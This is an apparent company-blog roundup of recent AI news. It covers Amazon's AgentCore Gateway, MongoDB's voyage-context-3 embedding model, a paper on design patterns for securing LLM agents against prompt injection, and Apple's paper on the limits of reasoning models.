Some recent AI news that grabbed our attention @ OpenArc:
AgentCore Gateway (ACG)
Amazon introduced the world to “Gateway” on August 15th, describing it as a platform that “serves as a centralized tool server, providing a unified interface where agents can discover, access, and invoke tools”. With built-in MCP support, Gateway makes it easy for agents and tools to communicate by taking care of the security, infrastructure, and protocol layers automatically.
We’re excited to take Gateway for a test drive – a platform that centralizes MCP tools for the enterprise and handles both inbound and outbound tool access and authorization control would be a big win for many companies.
Voyage-Context-3 by MongoDB
In late July, the MongoDB team introduced “voyage-context-3”, a “contextualized chunk embedding model that produces vectors for chunks that capture the full document context without any manual metadata and context augmentation, leading to higher retrieval accuracies than with or without augmentation.” The model delivers superior performance at chunk-level and document-level retrieval tasks compared to embedding models from OpenAI, Cohere-v4, and others.
Design Patterns for Securing LLM Agents against Prompt Injections
Simon Willison has an excellent summary of the key findings in a new paper by 11 authors from organizations including IBM, Invariant Labs, ETH Zurich, Google and Microsoft. The paper’s authors address the question, “what kinds of agents can we build today that produce useful work while offering resistance to prompt injection attacks?” Their guiding principle in answering this question, as Willison highlights early on, is that “once an LLM agent has ingested untrusted input, it must be constrained so that it is impossible for that input to trigger any consequential actions.” Highly recommend read!
LRM Research
In June, Apple released a paper in titled, “The Illusion of Thinking: Understanding the Strengths and Limitations of Reasoning Models via the Lens of Problem Complexity” which can be found at https://ml-site.cdn-apple.com/papers/the-illusion-of-thinking.pdf.
Researchers, using puzzle environments to assess three levels of task complexity, determined that Large Reasoning Models (LRMs) are only optimal for medium-complexity tasks. For low-complexity tasks, standard LLMs performed better, while high-complexity challenges resulted in complete model collapse. If replicated, this finding suggests that task complexity should be a critical factor when deciding whether to deploy a reasoning model.